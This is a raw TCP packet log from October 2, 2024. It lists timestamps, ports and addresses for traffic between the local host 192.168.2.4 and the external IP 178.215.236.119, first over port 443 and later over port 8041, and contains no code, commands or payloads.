Oct 2, 2024 06:16:38.790081024 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.790107012 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.790122986 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.790580988 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.790606976 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.790636063 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.790641069 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.790667057 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.790683031 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.794142008 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.794162035 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.794210911 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.794215918 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.794244051 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.794256926 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.794673920 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.794698954 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.794724941 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.794729948 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.794759035 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.794770956 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.795200109 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.795218945 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.795253992 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.795262098 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.795274019 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.795298100 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.795731068 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.795748949 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.795775890 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.795780897 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.795816898 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.795829058 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.796358109 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.796375990 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.796407938 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.796412945 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.796438932 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.796456099 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.877902031 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.877928019 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.877970934 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.877983093 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.878005028 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.878020048 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.878424883 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.878443003 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.878479958 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.878487110 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.878515005 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.878536940 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.879165888 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.879184008 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.879215956 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.879223108 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.879234076 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.879261017 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.879659891 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.879678965 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.879725933 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.879734039 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.879848957 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.880314112 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.880332947 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.880369902 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.880377054 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.880413055 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.880430937 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.880940914 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.880960941 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.881000996 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.881006956 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.881032944 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.881050110 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.881340981 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.881356955 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.881396055 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.881402016 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.881429911 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.881439924 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.881864071 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.881886959 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.881939888 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.881946087 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.882055044 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.966453075 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.966481924 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.966552019 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.966569901 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.966617107 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.966644049 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.967027903 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.967047930 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.967087984 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.967096090 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.967120886 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.967142105 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.967557907 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.967578888 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.967607975 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.967613935 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.967636108 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.967653990 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.968182087 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.968197107 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.968245029 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.968254089 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.968298912 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.968784094 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.968797922 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.968851089 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.968858004 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.968925953 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.969535112 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.969552040 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.969604969 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.969611883 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.969665051 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.970166922 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.970181942 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.970225096 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.970233917 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.970241070 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.970253944 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.970269918 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.970309019 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.970314980 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:38.972163916 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:38.986170053 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:39.054968119 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:39.055015087 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:39.055059910 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:39.055062056 CEST	443	49761	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:39.055083036 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:39.055104971 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:39.088359118 CEST	49761	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:39.267056942 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:39.267129898 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:39.267200947 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:39.267462969 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:39.267482042 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:39.906023979 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:39.907598019 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:39.907617092 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.178889990 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.178915024 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.178929090 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.178983927 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.179011106 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.179058075 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.267529011 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.267558098 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.267611027 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.267633915 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.267648935 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.267688036 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.268290043 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.268306017 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.268353939 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.268361092 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.268393993 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.355865002 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.355889082 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.356081009 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.356096983 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.356158018 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.356508017 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.356524944 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.356581926 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.356590986 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.357779980 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.357800961 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.357825994 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.357837915 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.357860088 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.357882023 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.439590931 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.439616919 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.439877987 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.439907074 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.439950943 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.444303036 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.444317102 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.444451094 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.444469929 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.445094109 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.445115089 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.445158005 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.445172071 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.445192099 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.445224047 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.445662975 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.445677996 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.445725918 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.445733070 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.446197033 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.446455956 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.446470022 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.446526051 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.446531057 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.448153019 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.523828983 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.523853064 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.523998022 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.524023056 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.524166107 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.526096106 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.526110888 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.526196957 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.526220083 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.526684046 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.526704073 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.526752949 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.526760101 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.526781082 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.526817083 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.528693914 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.528711081 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.528780937 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.528789043 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.532166004 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.533283949 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.533299923 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.533354998 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.533375025 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.533771992 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.533790112 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.533827066 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.533843040 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.533860922 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.533888102 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.534400940 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.534414053 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.534451962 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.534465075 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.534478903 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.534979105 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.535003901 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.535029888 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.535039902 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.535057068 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.535084009 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.536367893 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.612756968 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.612787962 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.612936020 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.612962008 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.615039110 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.615056992 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.615139961 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.615164995 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.615595102 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.615608931 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.615670919 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.615685940 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.616158962 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.617671967 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.617686987 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.617754936 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.617774963 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.617836952 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.622164965 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.622183084 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.622250080 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.622267008 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.622517109 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.622756004 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.622775078 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.622826099 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.622836113 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.622914076 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.623209953 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.623225927 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.623274088 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.623280048 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.623393059 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.623723030 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.623739958 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.623794079 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.623801947 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.623910904 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.701729059 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.701754093 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.701869965 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.701884031 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.703881979 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.703906059 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.703979015 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.703985929 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.704010963 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.704045057 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.704526901 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.704543114 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.704638958 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.704646111 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.705154896 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.706633091 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.706648111 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.706718922 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.706723928 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.706824064 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.711307049 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.711323977 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.711404085 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.711410999 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.711447001 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.711889029 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.711904049 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.711950064 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.711956024 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.711977005 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.711994886 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.712140083 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.712204933 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.712208986 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.712224007 CEST	443	49762	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:40.712272882 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:40.712702990 CEST	49762	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:44.193844080 CEST	49766	8041	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:44.198748112 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:44.198873997 CEST	49766	8041	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:45.252005100 CEST	49766	8041	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:45.257500887 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:45.435048103 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:45.460445881 CEST	49766	8041	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:45.465372086 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:45.666466951 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:45.710076094 CEST	49766	8041	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:45.793966055 CEST	8041	49766	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:45.835119009 CEST	49766	8041	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:46.514085054 CEST	49766	8041	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:46.514085054 CEST	49766	8041	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:46.519052029 CEST	8041	49766	178.215.236.119	192.168.2.4
